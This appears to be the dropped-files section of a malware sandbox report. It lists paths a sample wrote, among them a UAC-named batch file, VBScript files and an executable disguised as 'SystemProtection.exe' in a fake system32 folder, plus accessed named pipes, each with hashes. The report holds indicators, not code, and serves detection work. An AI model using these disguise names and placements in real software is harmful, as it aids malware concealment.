MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\tp.vbeFilesize
175B
MD5e6a69ddde6b0a867c0b11bcadeffdd58
SHA1bacd51425b6c90308493389fe9e5255f6485a6b9
SHA256eb4ed0aff93a219c49f5622f535b70df16bdcb12d20b6e382892d9d57bfde13c
SHA5125d16c61677bb9e7b2d244a2db0926970bd5cec8cad9142e5cc8287c5041c5bccf90aea00e606d10d45e94db9c42f79e2d7929a72e0562c7a48a3100414701946
-
C:\Users\Admin\AppData\Local\Temp\tp.vbeFilesize
175B
MD5e6a69ddde6b0a867c0b11bcadeffdd58
SHA1bacd51425b6c90308493389fe9e5255f6485a6b9
SHA256eb4ed0aff93a219c49f5622f535b70df16bdcb12d20b6e382892d9d57bfde13c
SHA5125d16c61677bb9e7b2d244a2db0926970bd5cec8cad9142e5cc8287c5041c5bccf90aea00e606d10d45e94db9c42f79e2d7929a72e0562c7a48a3100414701946
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\Users\Admin\AppData\Local\Temp\uac.batFilesize
1KB
MD5e2930c13dcc510ff3e677f744c13fcf2
SHA1d1bdcd06108a6bf848cf72181003ea587d1fbdb1
SHA256a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e
SHA5126a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721
-
C:\kernel\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Filesize 181KB
MD5 91f6b90fc19be94b62bb3ec2ff60fc30
SHA1 ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA256 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512 ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Filesize 181KB
MD5 91f6b90fc19be94b62bb3ec2ff60fc30
SHA1 ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA256 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512 ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
-
C:\system32\SystemProtection.exe
Filesize 165KB
MD5 8886e0697b0a93c521f99099ef643450
SHA1 851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256 d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512 fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837
-
C:\system32\bkr.bat
Filesize 568B
MD5 fc6f03cfefec6ed5e12c8de71c815751
SHA1 b35cb2e194b5167322acc4ab782f6bef76409de2
SHA256 ef8bd89fdc7a3e711849f318d97ab0693432daf34f7b83f18e894fa4d22e956f
SHA512 ba9fbfff61de7d68e8612b9364bc8cb04117727a38f6f77912b4c4895b064f83e8b33aee51e32fef945cd13c88b2e03c5a7e21910de71fe4cd8d1a0f93fd7ad3
-
C:\system32\r0k.rk
Filesize 8B
MD5 0438048db30e1b7f6ab1dc26028b9019
SHA1 da1a0594a0587908a2369708c3c6cdcc316cfbad
SHA256 59450696618a55d09cd8110b2a6191a4de8458da35f41a4112c3d408db9d6cc0
SHA512 d3106527baaca4150f934d19d4da846ea37db0378077695d4f5e1f4a7488e600467a3d22b481ebfc36b94dc95a6f195a24f041702cde301b00f455418e7e776d
-
\??\PIPE\lsarpc
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samr
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\system32\SystemProtection.exe
Filesize 165KB
MD5 8886e0697b0a93c521f99099ef643450
SHA1 851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256 d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512 fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837
-